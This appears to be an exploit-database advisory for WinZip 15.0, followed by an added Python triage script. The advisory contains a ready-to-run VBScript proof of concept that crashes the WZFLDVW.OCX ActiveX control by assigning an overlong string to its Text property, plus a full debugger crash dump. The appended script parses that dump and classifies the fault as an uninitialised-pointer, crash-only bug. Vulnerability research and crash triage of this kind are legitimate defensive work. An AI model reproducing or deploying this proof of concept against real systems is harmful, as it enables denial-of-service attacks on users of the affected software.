"WinZip 15.0 - WZFLDVW.OCX Text Property Denial of Service"

Author: Fady Mohammed Osman
Platform: windows
Release date: 2010-12-06

# Exploit Title: WinZip WZFLDVW.OCX Text property access violation
# Author: Fady Mohammed Osman
# Software Link : http://www.winzip.com/downwz.htm
# Version: 15.0 (Build 9334)
# Tested on: Win XP SP2
# CVE : N/A

# Website : http://www.darkmasters.co.cc/
# Twitter : http://twitter.com/Fady_Osman

<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<!-- Instantiate the WZFLDVW.OCX control by CLSID as the object named 'target' -->
<object classid='clsid:4E3770F4-1937-4F05-B9A2-959BE7321909' id='target' />
<script language='vbscript'>

'Wscript.echo typename(target)

'for debugging/custom prolog
'(reference values only; the script itself does not use them)
targetFile = "C:\Program Files\WinZip\WZFLDVW.OCX"
prototype  = "Invoke_Unknown Text As String"
memberName = "Text"
progid     = "FolderViewControl.TreeNode"
argCount   = 1

'1044-character string assigned to the Text property
arg1=String(1044, "A")

'Assigning the string triggers the access violation recorded below
target.Text = arg1

</script></job></package>

Exception Code: ACCESS_VIOLATION
Disasm: 1643D05	PUSH DWORD PTR [ECX+20]

Seh Chain:
--------------------------------------------------
1 	180B82F 	wzfldvw.ocx
2 	180B8F0 	wzfldvw.ocx
3 	73351571 	VBSCRIPT.dll
4 	73350F38 	VBSCRIPT.dll
5 	73351DA5 	VBSCRIPT.dll
6 	7335119D 	VBSCRIPT.dll
7 	7C8399F3 	KERNEL32.dll


Called From                   Returns To                    
--------------------------------------------------
wzfldvw.1643D05               wzfldvw.16314E1               
wzfldvw.16314E1               wzfldvw.1666F8C               
wzfldvw.1666F8C               wzfldvw.16434A0               
wzfldvw.16434A0               VBSCRIPT.73313A78             
VBSCRIPT.73313A78             VBSCRIPT.733139F6             
VBSCRIPT.733139F6             VBSCRIPT.73304B01             
VBSCRIPT.73304B01             VBSCRIPT.73306959             
VBSCRIPT.73306959             VBSCRIPT.73301E55             
VBSCRIPT.73301E55             VBSCRIPT.73303A76             
VBSCRIPT.73303A76             VBSCRIPT.7330BE2A             
VBSCRIPT.7330BE2A             VBSCRIPT.7330BEB9             
VBSCRIPT.7330BEB9             SCROBJ.5CE4915E               
SCROBJ.5CE4915E               SCROBJ.5CE4CF9C               
SCROBJ.5CE4CF9C               SCROBJ.5CE4D0E2               
SCROBJ.5CE4D0E2               SCROBJ.5CE4B106               
SCROBJ.5CE4B106               SCROBJ.5CE4B49F               
SCROBJ.5CE4B49F               100BB36                       
100BB36                       1005EFE                       
1005EFE                       1005215                       
1005215                       100492B                       
100492B                       1004A89                       
1004A89                       1003C7B                       
1003C7B                       KERNEL32.7C816D4F             


Registers:
--------------------------------------------------
EIP 01643D05 -> 00000001
EAX 0013EB1C -> 00000001
EBX 00000000
ECX BAADF00D
EDX 01642B94 -> 18EBD88B
EDI 00000008
ESI 0013EB70 -> 01666F8C
EBP 0013EB44 -> 0013EB6C
ESP 0013EB10 -> 0000113F


Block Disassembly: 
--------------------------------------------------
1643CF4	MOV EAX,[EBP+24]
1643CF7	MOV [EBP-4],EAX
1643CFA	LEA EAX,[EBP-28]
1643CFD	PUSH EAX
1643CFE	PUSH 0
1643D00	PUSH 113F
1643D05	PUSH DWORD PTR [ECX+20]	  <--- CRASH
1643D08	CALL [182CA6C]
1643D0E	LEAVE
1643D0F	RETN 20
1643D12	MOV EDI,EDI
1643D14	PUSH EBP
1643D15	MOV EBP,ESP
1643D17	SUB ESP,3C
1643D1A	MOV EAX,[EBP+8]


ArgDump:
--------------------------------------------------
EBP+8	BAADF00D
EBP+12	00000001
EBP+16	0019B05C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+20	00000000
EBP+24	00000000
EBP+28	00000000


Stack Dump:
--------------------------------------------------
13EB10 3F 11 00 00 00 00 00 00 1C EB 13 00 01 00 00 00  [................]
13EB20 0D F0 AD BA 00 00 00 00 00 00 00 00 5C B0 19 00  [............\...]
13EB30 D0 EB 13 00 00 00 00 00 00 00 00 00 08 EC 13 00  [................]
13EB40 00 00 00 00 6C EB 13 00 E1 14 63 01 0D F0 AD BA  [....l.....c.....]
13EB50 01 00 00 00 5C B0 19 00 00 00 00 00 00 00 00 00  [....\...........]



ApiLog
--------------------------------------------------

***** Installing Hooks *****
7c826cab     CreateFileA(C:\WINDOWS\system32\rsaenh.dll)
7c826cab     CreateFileA(C:\WINDOWS\system32\rsaenh.dll)
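As an added triage example (not part of the original advisory), the code below parses the register and faulting-instruction lines of a dump like the one above and classifies the fault by the value in the base register: ECX holding BAADF00D is the Windows debug-heap fill for memory that was never initialised, so the pointer was not derived from the input string, which is consistent with a crash-only denial of service rather than a controlled write. The dump excerpt is constructed from the values shown above.

```python
import re

# Constructed excerpt of the crash dump reproduced above (values copied from it).
CRASH_DUMP = """Exception Code: ACCESS_VIOLATION
Disasm: 1643D05    PUSH DWORD PTR [ECX+20]

Registers:
--------------------------------------------------
EIP 01643D05 -> 00000001
ECX BAADF00D
EDX 01642B94 -> 18EBD88B
"""

# Windows debug-heap fill values: a pointer holding one of these was loaded from
# heap memory that was never initialised (BAADF00D) or already freed (FEEEFEEE).
HEAP_FILL = {0xBAADF00D: "uninitialised heap memory", 0xFEEEFEEE: "freed heap memory"}

REG_LINE = re.compile(r"^(E[A-Z]{2}) ([0-9A-F]{8})", re.M)
DISASM_LINE = re.compile(r"^Disasm: [0-9A-F]+\s+(.+)$", re.M)
MEM_OPERAND = re.compile(r"\[(E[A-Z]{2})(?:\+([0-9A-F]+))?\]")  # e.g. [ECX+20]

def parse_registers(dump):
    # Map register name -> value from the 'Registers:' block.
    return {m.group(1): int(m.group(2), 16) for m in REG_LINE.finditer(dump)}

def faulting_operand(dump):
    # (base register, displacement) of the memory operand in the faulting instruction.
    line = DISASM_LINE.search(dump)
    op = MEM_OPERAND.search(line.group(1)) if line else None
    if op is None:
        return None
    return op.group(1), int(op.group(2) or "0", 16)

def triage(dump):
    # Classify the crash by what the faulting dereference's base register holds.
    operand = faulting_operand(dump)
    if operand is None:
        return {"verdict": "no-memory-operand"}
    reg, disp = operand
    base = parse_registers(dump)[reg]
    info = {"register": reg, "base": base, "address": (base + disp) & 0xFFFFFFFF}
    if base in HEAP_FILL:
        # Pointer came from fill memory, not from the input: crash-only, i.e. DoS.
        info["verdict"], info["detail"] = "uninitialised-pointer", HEAP_FILL[base]
    elif base in (0x41414141, 0x00410041):  # 'A' pattern from the input, ASCII or UTF-16
        # The pointer is input-derived; the crash needs deeper analysis.
        info["verdict"] = "input-derived-pointer"
    else:
        info["verdict"] = "null-pointer" if base == 0 else "other"
    return info
```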